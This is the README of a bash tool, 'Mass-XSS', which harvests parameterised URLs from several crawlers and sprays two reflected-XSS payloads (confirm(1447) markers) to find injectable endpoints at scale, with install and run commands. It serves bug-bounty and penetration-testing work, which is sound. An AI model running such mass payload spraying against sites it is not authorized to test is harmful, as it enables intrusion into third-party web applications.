Mass-XSS is a bash one-liner-style automation that takes a list of subdomains and hunts reflected XSS at scale. It harvests historical and crawled URLs from multiple sources, filters down to parameterised endpoints, and sprays XSS payloads via airixss to validate hits.
subdomains.txt
├─► gau ──┐
├─► waybackurls ├─► merged URL set
├─► katana (passive) │
└─► hakrawler ┘
│
▼
filter to ?param=value URLs
│
▼
qsreplace + airixss (XSS detection)
│
▼
results.txt
Requires Go 1.17+.
go install github.com/lc/gau/v2/cmd/gau@latest
go install github.com/tomnomnom/waybackurls@latest
go install github.com/projectdiscovery/katana/cmd/katana@latest
go install github.com/hakluke/hakrawler@latest
go install github.com/tomnomnom/qsreplace@latest
go install github.com/ferreiraklet/airixss@latestMake sure $GOPATH/bin (or $HOME/go/bin) is in your PATH.
git clone https://github.com/PiyushThePal/Mass-XSS.git
cd Mass-XSS
chmod +x mass-xss.sh
./mass-xss.sh subdomains.txtOutputs:
URLS/gau_urls.txt,URLS/wayback.urls.txt,URLS/ktna_urls.txt,URLS/hkrwlr_url.txt— raw URL collections from each sourceURLS/param_urls.txt— URLs containing?or=results.txt— confirmed XSS hits (only lines containing the payload marker)
The script tests two payload shapes against every parameterised URL:
';confirm(1447);//cxxx
"><img/src/onerror=confirm(1447)>
Both fire confirm(1447) — airixss looks for that exact string in the rendered page to confirm execution. To customise, edit the qsreplace lines and the -p arguments in mass-xss.sh.
This tool is for authorized security testing only — bug bounty programs with explicit XSS scope, internal pentests, CTFs, or your own infrastructure. Spraying XSS payloads at targets you don't have permission to test is illegal and unethical.
MIT